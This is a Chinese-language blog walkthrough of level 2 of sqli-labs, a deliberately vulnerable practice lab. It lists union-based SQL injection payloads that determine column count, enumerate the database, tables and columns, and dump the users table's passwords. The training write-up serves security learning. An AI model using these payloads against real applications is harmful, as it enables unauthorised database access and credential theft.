备案控制台
开发者社区 数据库 文章 正文

sqli-labs---第二关

2024-05-22 21
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sqli-labs---第二关

1、判断是什么类型注入


?id=1        显示正常


?id=1'       报错


?id=1#      显示正常


?id=1'#     报错


可以知道这里是数字型注入


2、查询有多少列


?id=1 and 1=2 order by 3#   没有报错


?id=1 and 1=2 order by 4#     报错


说明有3列



3、查询数据库名


?id=1 and 1=2 union select 1,database(),3#  

4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)


?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

6、查询字段中的值

?id=1 and 1=2 union select 1,2,group_concat(password) from security.users--+

文章标签:
安全
数据库
不拿flag不改名
目录
相关文章
未名编程
|
7天前
|
数据安全/隐私保护
【less-4】sqli-labs靶场第四关
【less-4】sqli-labs靶场第四关
未名编程
7 1
不拿flag不改名
|
1月前
|
安全 数据库
sqli-labs---第五关
sqli-labs---第五关
不拿flag不改名
35 1
不拿flag不改名
|
1月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第四关
sqli-labs---第四关
不拿flag不改名
27 1
未名编程
|
7天前
|
SQL 安全 关系型数据库
【less-2】sqli-labs靶场第二关
【less-2】sqli-labs靶场第二关
未名编程
16 0
不拿flag不改名
|
1月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第三关
sqli-labs---第三关
不拿flag不改名
25 1
sumith
|
1月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
sumith
18 1
士别三日wyx
|
SQL 安全 数据库
SQLi 38关
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式
士别三日wyx
125 0
SQLi 38关
士别三日wyx
|
SQL
SQLi LABS Less-23
第23关使用GET请求传递参数,在url地址栏构造payload即可 此关卡对注释符号进行了过滤,因此不能使用注释符,可以使用单引号闭合,使SQL的语法结构成立
士别三日wyx
123 0
SQLi LABS Less-23
士别三日wyx
|
SQL
SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号
士别三日wyx
125 0
SQLi LABS Less-31
士别三日wyx
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-22
2关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大
士别三日wyx
91 0
SQLi LABS Less-22